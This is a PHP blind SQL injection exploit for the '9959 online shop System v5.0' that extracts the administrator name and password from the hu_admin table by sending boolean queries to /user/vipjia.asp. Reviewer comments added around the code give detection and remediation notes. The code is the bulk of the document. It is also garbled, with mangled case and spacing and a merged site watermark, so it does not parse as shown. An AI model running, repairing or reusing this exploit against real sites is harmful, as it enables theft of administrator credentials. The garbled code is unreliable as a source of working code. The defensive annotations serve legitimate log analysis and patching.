Author: stuffy bean,
========================================================== ==========================================
<? Php
// NOTE(review): this listing was published case- and whitespace-mangled (spaces inside
// variable names, capitalised keywords, a non-ASCII closing quote on the charset string),
// so it does not parse as PHP in this form. It is kept as found; the comments describe
// what it shows, for log analysis and remediation.
//
// Flow of the script as written: print a banner, require two command-line arguments
// (a host and a value for the id parameter), then call lenstr() and pojie() for the
// names adminname and password, printing a length and then the characters for each.
// Both helpers append a boolean SQL condition to the id query parameter of
// /user/vipjia.asp (action=loads) and decide true or false from whether the response
// body contains the marker string times.
// NOTE(review): that can only work if the page puts id into its SQL text without
// validation or parameter binding -- presumably string concatenation; confirm against
// the ASP source.
//
// Defender notes:
//  - Remediation: in vipjia.asp accept id only as an integer and pass it to the database
//    as a bound parameter instead of building the statement from the raw query string.
//  - Detection: web-server logs show bursts of near-identical GET requests to
//    /user/vipjia.asp in which id is followed by an and (select top 1 len(...) or
//    mid(...) from hu_admin) condition; only the number or the compared character changes
//    from one request to the next.
//  - Response: if such requests appear in the logs, treat the hu_admin credentials as
//    disclosed and rotate them.
Print_r ('
+ ------------------------- +
9959 online shop System v5.0
Blind SQL injection exploit by mendou
05
Official Website: www.9959shop.com www.2cto.com
+ ------------------------- +
');
// Fewer than two arguments: print the usage text and stop.
If ($ argc <
2 ){
Print_r ('
+ ------------------------- +
Usage: php
'. $ Argv [0].' host id
Example:
Php
'. $ Argv [0].' localhost id
+ ------------------------- +
');
Exit;
}
// PHP error output is switched off and the execution time limit is set to 0 (no limit).
Error_reporting (0 );
Ini_set ('max _ execution_time ', 0 );
// First argument: the host name that is placed into the request URL by both helpers.
$ Host =
$ Argv [1];
// Candidate alphabet compared against each character position: letters and digits only,
// 36 values in total.
// NOTE(review): a letters-and-digits alphabet suggests the password column is expected to
// hold a hex digest rather than plaintext -- not established by this listing; confirm.
$ Str =
"Abcdefghijklmnopqrstuvwxyz0123456789 ″;
$ Strlen
= Strlen ($ str );
$ Pid = $ argv [2];
$ N_len =
Lenstr (adminname); // user Length
Echo
"User length:". $ n_len. "\ r \ n ";
Pojie ("adminname", $ n_len); echo "\ r \ n ";
$ P_len =
Lenstr (password); // password length
Echo
"Password length:". $ p_len. "\ r \ n ";
Pojie ("password", $ p_len );
// pojie(str1, len): prints the value of column str1 from the first hu_admin row, one
// character at a time.
//   str1 - column name inserted into the SQL condition (called with adminname and password)
//   len  - number of character positions to test, as returned by lenstr()
// Reads the globals host, strlen, str and pid set by the top-level script.
// For every position from 1 to len it walks the candidate alphabet and sends one request
// per candidate, so a single value costs up to len * 36 requests. That request volume
// against one URL is the main detection signal in access logs.
// NOTE(review): top and mid are the Access (Jet) spellings -- presumably an Access
// database sits behind the ASP pages; confirm.
Function
Pojie ($ str1, $ len ){
Global $ host, $ strlen, $ str, $ pid;
For
($ J = 1; $ j <= $ len; $ j ++ ){
For ($ I = 0; $ I <$ strlen;
$ I ++ ){
// Condition appended to id: the character at position j of the column equals candidate I.
$ Exp =
"% 20and % 20 (select % 20top % 201% 20mid (". $ str1 .",". $ j. ", 1) % 20 from % 20hu_admin) = '". $ str [$ I]. "'";
// One GET request per candidate; the id value from the command line is followed
// directly by the condition, with no separator or encoding step in between.
$ A =
File_get_contents ('HTTP: // '. $ host.'/user/vipjia. asp? Action = loads & id = '. $ pid. $ exp );
// The marker string times in the response body is taken to mean the condition held;
// the matching character is printed and the inner loop ends for this position.
If
(Strpos ($ a, "times") = true ){
Echo
$ Str [$ I]; break;
}
}
}
}
// Helper function: determine the length of the user name or password
// lenstr(str): returns the length of column str in the first hu_admin row.
//   str - column name inserted into the SQL condition
// Reads the globals host and pid set by the top-level script.
// Tests len(str) = i for i from 1 to 30, one request per value, and returns the first i
// whose response contains the marker string times. There is no return after the loop,
// so nothing is returned when no length up to 30 matches.
// In access logs this shows up as at most 30 requests to /user/vipjia.asp that differ
// only in the trailing number.
// NOTE(review): Www.2cto.com at the start of the next line is a site watermark that was
// merged into the listing during republication, not part of the code.
Www.2cto.com function lenstr ($ str ){
Global
$ Host, $ pid;
For ($ I = 1; $ I <= 30; $ I ++ ){
// Condition appended to id: the length of the column equals I.
$ Exp =
"% 20and % 20 (select % 20top % 201% 20len (". $ str. ") % 20 from % 20hu_admin) =". $ I;
$ A =
File_get_contents ('HTTP: // '. $ host.'/user/vipjia. asp? Action = loads & id = '. $ pid. $ exp );
// Same true/false test as in pojie(): presence of the marker string in the response body.
If
(Strpos ($ a, "times") = true ){
Return $ I;
}
}
}
?>
========================================================== ==========================================